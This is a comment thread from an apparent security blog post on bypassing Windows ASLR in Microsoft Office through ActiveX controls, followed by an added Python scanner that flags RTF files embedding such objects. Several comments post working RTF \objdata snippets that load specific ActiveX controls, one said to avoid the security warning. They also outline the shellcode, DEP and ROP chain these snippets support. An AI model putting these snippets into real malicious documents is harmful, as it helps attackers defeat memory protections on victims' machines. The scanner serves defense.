7 comments on “Bypassing Windows ASLR in Microsoft Office using ActiveX controls”

  1. Could you tell us how these ActiveX are named in Office “More controls”?
    I can’t find them.

  2. Hi Joe, yes you’ll need an actual vulnerability. Say you’ve placed shellcode in memory, in order to execute it you’ll need to make that memory where the shellcode resides executable. To make it executable you’ll need to bypass DEP. For this you need ROP shellcode and for this shellcode you need to start with a fixed address and that’s where ASLR bypass comes in.

  3. @
    “{20347534-760B-464D-B572-285E6B618257} SSCE.Error.3.5”

    Is this right:

    [code]
    {\object\objocx{\*\objdata
    01050000
    02000000

    08000000
    535343452E4572726F722E332E35

    00000000
    00000000
    D4290000
    }} [/code]

  4. This is the correct code below; the size was wrong and the hex string needs to be null-terminated.

    {\rtf1{\object\objocx{\*\objdata
    01050000
    02000000
    0F000000
    535343452E4572726F722E332E3500
    00000000
    00000000
    01000000
    41
    01050000
    00000000
    }}}

  5. Here is an example of loading classid {BC0CD90A-2C24-41BE-B6EC-87C15D919418} in RTF format that doesn’t give the security warning

    C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x86\FeedSync.dll

    {\rtf1{\object\objemb{\*\oleclsid \’7bBC0CD90A-2C24-41BE-B6EC-87C15D919418\’7d}{\*\objdata
    01050000
    01000000
    01000000
    00000000
    00000000
    00000000
    00000000
    00000000
    00000000
    00000000
    00}}}
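As an added example (not code from the post or from any commenter): a small Python scanner that pulls the `\object` groups out of an RTF file, decodes the OLE1 ObjectHeader that opens `\objdata` (the field layout comment 4 corrected: a 4-byte length that counts the terminating NUL, then the NUL-terminated ProgID), and reports the ProgID or the `\oleclsid` value so a defender can flag documents that embed ActiveX controls this way. The two sample strings are the snippets from comments 4 and 5 joined onto single lines; the header field order and FormatID meanings are assumed from the MS-OLEDS specification.

```python
import re
import struct

# Constructed samples: the \objdata snippets posted in comments 4 and 5 above, put on one line each
RTF_PROGID = (r"{\rtf1{\object\objocx{\*\objdata 01050000 02000000 0F000000 "
              r"535343452E4572726F722E332E3500 00000000 00000000 01000000 41 01050000 00000000}}}")
RTF_CLSID = (r"{\rtf1{\object\objemb{\*\oleclsid \'7bBC0CD90A-2C24-41BE-B6EC-87C15D919418\'7d}"
             r"{\*\objdata 01050000 01000000 01000000 00000000 00000000 00000000 00000000 "
             r"00000000 00000000 00000000 00}}}")

FORMAT_IDS = {1: "linked", 2: "embedded"}  # MS-OLEDS ObjectHeader.FormatID values (assumed from the spec)
OBJ_RE = re.compile(r"\\object(?P<body>.*?)\{\\\*\\objdata\s*(?P<hex>[0-9A-Fa-f\s]*)\}", re.S)

def rtf_unescape(s):
    # Decode RTF \'hh escapes, e.g. \'7b -> '{' and \'7d -> '}' around the CLSID
    return re.sub(r"\\'([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def lp_ansi(buf, off):
    # LengthPrefixedAnsiString: uint32 byte count (including the NUL), then the bytes
    (n,) = struct.unpack_from("<I", buf, off)
    text = buf[off + 4:off + 4 + n].split(b"\0", 1)[0].decode("latin-1")
    return text, off + 4 + n

def parse_objdata(hexblob):
    # Decode the OLE1 ObjectHeader that opens \objdata: version, FormatID, ClassName, TopicName, ItemName
    try:
        raw = bytes.fromhex(re.sub(r"\s+", "", hexblob))
        ver, fmt = struct.unpack_from("<II", raw, 0)
        cls, off = lp_ansi(raw, 8)
        topic, off = lp_ansi(raw, off)
        item, off = lp_ansi(raw, off)
    except (ValueError, struct.error):
        return None  # odd-length hex, or header truncated before the three strings
    return {"ole_version": ver, "format": FORMAT_IDS.get(fmt, "unknown"),
            "class_name": cls, "topic_name": topic, "item_name": item}

def scan_rtf(rtf):
    # One finding per \object group: the embed control word, any \oleclsid, and the decoded header
    findings = []
    for m in OBJ_RE.finditer(rtf):
        body = m.group("body")
        kind = re.search(r"\\(objocx|objemb|objlink|objautlink)\b", body)
        clsid = re.search(r"\\\*\\oleclsid\s*([^}]*)\}", body)
        findings.append({"kind": kind.group(1) if kind else None,
                         "clsid": rtf_unescape(clsid.group(1)).strip() if clsid else None,
                         "header": parse_objdata(m.group("hex"))})
    return findings
```

Run `scan_rtf(open(path).read())` over a suspect file; the first sample yields ProgID `SSCE.Error.3.5` as an embedded `\objocx` object, the second yields the braced CLSID from `\oleclsid` with an empty class name.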
